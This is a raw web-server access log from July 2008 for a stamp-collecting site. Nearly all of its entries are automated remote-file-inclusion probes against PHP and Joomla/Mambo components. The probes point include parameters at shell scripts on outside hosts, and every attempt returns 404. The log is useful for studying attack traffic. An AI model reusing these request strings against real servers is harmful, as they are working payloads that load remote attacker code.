60.50.152.209 - - [13/Jul/2008:20:33:54 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/pahlawankuruskering/x/ido.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
60.50.152.209 - - [13/Jul/2008:20:33:55 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/pahlawankuruskering/x/ido.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
60.50.152.209 - - [13/Jul/2008:20:33:56 -0700] "GET /logs/access_080609.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.geocities.com/pahlawankuruskering/x/ido.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
81.169.134.72 - - [13/Jul/2008:20:36:09 -0700] "GET /logs/access_080630.log//rgboard/include/bbs.lib.inc.php?site_path=http://www.spacetv.ru/admin/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.134.72 - - [13/Jul/2008:20:36:09 -0700] "GET //rgboard/include/bbs.lib.inc.php?site_path=http://www.spacetv.ru/admin/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
81.169.134.72 - - [13/Jul/2008:20:36:09 -0700] "GET /logs//rgboard/include/bbs.lib.inc.php?site_path=http://www.spacetv.ru/admin/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
85.18.81.164 - - [13/Jul/2008:20:36:22 -0700] "GET /logs/access.log//rgboard/include/bbs.lib.inc.php?site_path=http://www.spacetv.ru/admin/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.20.138.101 - - [13/Jul/2008:20:37:18 -0700] "GET /logs/access_080609.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://boutique.sodime.fr/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.20.138.101 - - [13/Jul/2008:20:37:19 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://boutique.sodime.fr/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.20.138.101 - - [13/Jul/2008:20:37:19 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://boutique.sodime.fr/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.84.27.98 - - [13/Jul/2008:20:38:12 -0700] "GET /logs/access_080602.log//include/admin.lib.inc.php?site_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
204.15.10.22 - - [13/Jul/2008:20:39:45 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
204.15.10.22 - - [13/Jul/2008:20:39:45 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
83.19.144.26 - - [13/Jul/2008:20:41:37 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.mathstamps.com"
83.19.144.26 - - [13/Jul/2008:20:41:37 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/errors.php?error=http://www.tolokan.ovh.org/classes/adodbt/.../rid?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.mathstamps.com"
217.20.138.101 - - [13/Jul/2008:20:42:27 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://boutique.sodime.fr/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.225.192.249 - - [13/Jul/2008:20:43:55 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.192.249 - - [13/Jul/2008:20:43:56 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.192.249 - - [13/Jul/2008:20:43:56 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.192.249 - - [13/Jul/2008:20:43:57 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.192.249 - - [13/Jul/2008:20:43:57 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.192.249 - - [13/Jul/2008:20:43:57 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.20.138.101 - - [13/Jul/2008:20:43:58 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://boutique.sodime.fr/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.225.192.249 - - [13/Jul/2008:20:43:59 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.192.249 - - [13/Jul/2008:20:43:59 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.192.249 - - [13/Jul/2008:20:43:59 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.192.249 - - [13/Jul/2008:20:44:28 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.192.249 - - [13/Jul/2008:20:44:28 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
66.225.192.249 - - [13/Jul/2008:20:44:28 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.217.156.81 - - [13/Jul/2008:20:48:23 -0700] "GET /logs/access_080616.log/index.php?redir=http://edzzard.deltha-ro.com/r57act.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
217.217.156.81 - - [13/Jul/2008:20:48:26 -0700] "GET /logs/index.php?redir=http://edzzard.deltha-ro.com/r57act.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
81.169.134.72 - - [13/Jul/2008:20:51:57 -0700] "GET /logs/access.log//rgboard/include/bbs.lib.inc.php?site_path=http://www.spacetv.ru/admin/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.219.212 - - [13/Jul/2008:20:54:39 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/asucok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.217.156.81 - - [13/Jul/2008:20:57:29 -0700] "GET /logs/access_080310.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://edzzard.deltha-ro.com/r57act.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
217.217.156.81 - - [13/Jul/2008:21:01:14 -0700] "GET /logs/access_080623.log/index.php?redir=http://edzzard.deltha-ro.com/r57act.php? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
87.106.219.212 - - [13/Jul/2008:21:01:37 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/asucok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.219.212 - - [13/Jul/2008:21:01:37 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/asucok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
87.106.219.212 - - [13/Jul/2008:21:02:19 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/asucok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:05:06 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:07:07 -0700] "GET /logs/access_080310.log//phpSecurePages/secure.php?&cfgProgDir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:07:07 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:07:07 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:07:22 -0700] "GET /logs/access_080512.log//phpSecurePages/secure.php?&cfgProgDir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:08:14 -0700] "GET /logs/access_080609.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:08:14 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:08:14 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:09:35 -0700] "GET //index.php?option=com_uhp&task=view&Itemid=37&id=12&mosConfig_absolute_path=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
87.106.219.212 - - [13/Jul/2008:21:09:53 -0700] "GET /logs/access_080602.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/asucok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:12:32 -0700] "GET /logs/access_080505.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:12:32 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:12:32 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:12:37 -0700] "GET /logs/access_080609.log//index.php?option=com_uhp&task=view&Itemid=37&id=12&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:12:37 -0700] "GET //index.php?option=com_uhp&task=view&Itemid=37&id=12&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:12:37 -0700] "GET /logs//index.php?option=com_uhp&task=view&Itemid=37&id=12&mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:12:41 -0700] "GET /logs/access_080428.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
194.143.183.8 - - [13/Jul/2008:21:13:32 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:13:43 -0700] "GET /logs/access_080630.log//newspublish/include.php?path%5Bdocroot%5D=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:13:43 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:13:44 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
82.194.70.164 - - [13/Jul/2008:21:14:25 -0700] "GET /logs/access_080421.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.194.70.164 - - [13/Jul/2008:21:14:25 -0700] "GET /logs/access_080421.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.194.70.164 - - [13/Jul/2008:21:14:25 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.194.70.164 - - [13/Jul/2008:21:14:25 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.194.70.164 - - [13/Jul/2008:21:14:26 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.194.70.164 - - [13/Jul/2008:21:14:26 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:14:48 -0700] "GET /logs/access_080310.log//phpSecurePages/secure.php?&cfgProgDir=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:14:48 -0700] "GET //phpSecurePages/secure.php?&cfgProgDir=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:14:48 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:14:59 -0700] "GET /logs/access_080512.log//phpSecurePages/secure.php?&cfgProgDir=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:15:12 -0700] "GET /logs/access_080609.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:15:13 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
160.99.12.231 - - [13/Jul/2008:21:16:02 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
64.72.117.112 - - [13/Jul/2008:21:20:31 -0700] "GET /logs/access_080602.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:22:01 -0700] "GET /logs/access_080630.log//newspublish/include.php?path%5Bdocroot%5D=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:22:01 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:22:01 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
82.194.70.164 - - [13/Jul/2008:21:22:27 -0700] "GET /logs/access_080526.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.20.138.101 - - [13/Jul/2008:21:22:27 -0700] "GET /logs/access_080623.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://boutique.sodime.fr/mambots/content/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.194.70.164 - - [13/Jul/2008:21:22:29 -0700] "GET /logs/access_080526.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:22:43 -0700] "GET /logs/access_080602.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:23:34 -0700] "GET /logs/access_080505.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:23:34 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:23:35 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:23:44 -0700] "GET /logs/access_080428.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:25:30 -0700] "GET /logs/access_080609.log//index.php?option=com_uhp&task=view&Itemid=37&id=12&mosConfig_absolute_path=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
205.234.197.96 - - [13/Jul/2008:21:25:31 -0700] "GET /logs//index.php?option=com_uhp&task=view&Itemid=37&id=12&mosConfig_absolute_path=http://genthal.com/data/alb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
160.99.12.231 - - [13/Jul/2008:21:29:59 -0700] "GET /logs/access_080609.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [13/Jul/2008:21:29:59 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [13/Jul/2008:21:32:53 -0700] "GET //index.php?option=com_uhp&task=view&Itemid=37&id=12&mosConfig_absolute_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
194.143.183.8 - - [13/Jul/2008:21:34:28 -0700] "GET /logs/access_080505.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
194.143.183.8 - - [13/Jul/2008:21:34:29 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.6.18.233 - - [13/Jul/2008:21:35:32 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.6.18.233 - - [13/Jul/2008:21:35:39 -0700] "GET /logs/access_080616.log HTTP/1.0" 200 5490557 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
194.143.183.8 - - [13/Jul/2008:21:35:59 -0700] "GET /logs/access_080407.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.tiptopwendys.co.za/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.6.18.233 - - [13/Jul/2008:21:38:41 -0700] "GET /logs/?S=A HTTP/1.0" 200 8501 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
74.6.18.233 - - [13/Jul/2008:21:40:50 -0700] "GET /logs/access_080714.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
70.85.102.100 - - [13/Jul/2008:21:43:41 -0700] "GET /logs//components/errors.php?error=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
70.85.102.100 - - [13/Jul/2008:21:43:41 -0700] "GET //components/errors.php?error=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
194.79.75.195 - - [13/Jul/2008:21:43:58 -0700] "GET /errors.php?error=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
194.79.75.195 - - [13/Jul/2008:21:43:58 -0700] "GET /logs/errors.php?error=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
160.99.12.231 - - [13/Jul/2008:21:44:12 -0700] "GET /logs/access_080602.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [13/Jul/2008:21:44:32 -0700] "GET /logs/access_080630.log//newspublish/include.php?path%5Bdocroot%5D=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [13/Jul/2008:21:44:33 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
